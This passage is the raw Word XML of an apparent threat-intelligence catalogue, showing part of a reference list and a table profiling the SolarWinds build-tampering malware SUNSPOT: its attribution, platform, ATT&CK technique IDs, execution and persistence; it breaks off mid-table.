              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2. </w:t>
            </w:r>
            <w:hyperlink r:id="rId24" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK Software Catalog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3. </w:t>
            </w:r>
            <w:hyperlink r:id="rId25" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Cisco Talos Research</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4. </w:t>
            </w:r>
            <w:hyperlink r:id="rId26" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>VMware Threat Analysis</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5. </w:t>
            </w:r>
            <w:hyperlink r:id="rId27" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Proofpoint Threat Research</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BDBBA0C" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2110B8D9" w14:textId="531C4FDD" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sunspot </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="009B4494" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> S0562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1"/>
        <w:gridCol w:w="8887"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="706BF013" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06BC0B3A" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77075C46" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0941970B" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77E5F279" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Name &amp; Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B94099D" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>SUNSPOT (S0562)</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Malware / Build Environment Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="78A670D3" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="344C2DA8" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69804365" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>SUNSPOT is malware used during the SolarWinds supply-chain compromise to silently modify the build process of the SolarWinds Orion software. It monitored build environments and replaced legitimate source files with malicious versions to inject the SUNBURST backdoor into compiled software builds.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="65587C68" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24434784" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Threat Actor Association</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="441B45FB" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>APT29, NOBELIUM, UNC2452</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="60EA0449" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EA993E6" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Supported Platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A9BAA89" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="6D8AD8E3" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CB35F68" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>ATT&amp;CK Techniques Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="585FC80F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1554</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Compromise Client Software Binary </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1036</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Masquerading </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Obfuscated Files or Information </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1055</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Process Injection </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1070</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Indicator Removal on Host </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1543.003</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Create or Modify System Process: Windows Service </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1106</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Native API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="37CC61CA" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02AF7CD2" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Execution Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21543D9D" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">Executed within the SolarWinds build environment. SUNSPOT monitored active build processes and automatically replaced legitimate source code files during compilation with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>trojanized</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> code containing the SUNBURST backdoor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="36784CEE" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36D0643D" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Persistence Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73A25A8A" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Installed as a Windows service to maintain persistent access and continue monitoring build operations over time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0A7728C4" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="402C1669" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76648CB6" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No direct privilege escalation mechanism publicly documented; relied on privileged access already obtained within the build environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="48D05288" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1863AA6B" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="428D7BB9" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
